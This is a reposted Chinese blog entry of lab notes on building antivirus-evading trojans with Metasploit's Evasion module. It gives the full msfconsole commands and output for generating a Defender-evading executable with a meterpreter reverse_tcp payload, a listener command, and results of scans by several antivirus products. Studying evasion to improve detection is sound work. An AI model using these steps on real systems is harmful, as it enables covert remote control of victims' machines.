MSF-Evasion模块免杀

有目标就不怕路远。年轻人.无论你现在身在何方.重要的是你将要向何处去。只有明确的目标才能助你成功。没有目标的航船.任何方向的风对他来说都是逆风。因此,再遥远的旅程,只要有目标.就不怕路远。没有目标,哪来的劲头?一车尔尼雷夫斯基

导读:本篇文章讲解 MSF-Evasion模块免杀,希望对大家有帮助,欢迎收藏,转发!站点地址:www.bmabk.com,来源:原文

最近开始学习免杀,发现Tide团队有免杀的系列文章,先膜拜一波大佬,这里的博客是复现和学习的笔记,如果你对内容感兴趣可以学习参考链接里提供的地址

远控免杀专题文章(4)-Evasion模块免杀(VT免杀率12/71)

实验环境

为避免木马被杀导致别的平台没有机会检测,实验时会每次只启动一个杀软,然后截图,最后把关于这个木马的截图汇成一张图
选择的是当下最新版本的火绒、360、360杀毒、腾讯电脑管家,版本如下:
火绒:5.0.55.2
腾讯电脑管家:13.6.20672.243
360:12.0.0.2003
360杀毒:50.0.8170(64位)

前言

2019年1月,metasploit升级到了5.0,引入了一个新的模块叫Evasion模块,官方宣称这个模块可以创建反杀毒软件的木马。

evasion有以下几个模块,可以使用show evasion进行查看。
在这里插入图片描述

defender(VT查杀率42/69)

使用use windows/windows_defender_exe进行生成payload

msf5 > use windows/windows_defender_exe
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf5 evasion(windows/windows_defender_exe) > show options

Module options (evasion/windows/windows_defender_exe):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME  DQPpQq.exe       yes       Filename for the evasive file (default: random)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.239.128  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Evasion target:

   Id  Name
   --  ----
   0   Microsoft Windows


msf5 evasion(windows/windows_defender_exe) > set filename payload.exe
filename => payload.exe
msf5 evasion(windows/windows_defender_exe) > run

[*] Compiled executable size: 4096
[+] payload.exe stored at /root/.msf4/local/payload.exe

在这里插入图片描述
MSF开启监听

handler -H 192.168.239.129 -P 4444 -p windows/meterpreter/reverse_tcp

关闭杀软的情况下,可以正常上线
在这里插入图片描述
开启杀软
火绒、360杀毒静态可杀,360动态可杀,腾讯电脑管家失败
在这里插入图片描述

在这里插入图片描述

hta(VT查杀率26/61)

生成payload
在这里插入图片描述
开启监听
没有杀软的情况下可以正常上线在这里插入图片描述
开启杀软的情况下
腾讯电脑管家静态可杀,360、360杀毒、火绒失败
在这里插入图片描述
在这里插入图片描述
双击运行程序的时候,火绒和360报毒,360杀毒失败
在这里插入图片描述

其他

evsion共有7个模块,但是其他几个好像还需要后续加工一下,暂时略过
MSF-Evasion模块免杀

在这里插入图片描述

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

文章由极客之音整理,本文链接:https://www.bmabk.com/index.php/post/134348.html

(0)
飞熊的头像飞熊bm

相关推荐

发表回复

登录后才能评论
极客之音——专业性很强的中文编程技术网站,欢迎收藏到浏览器,订阅我们!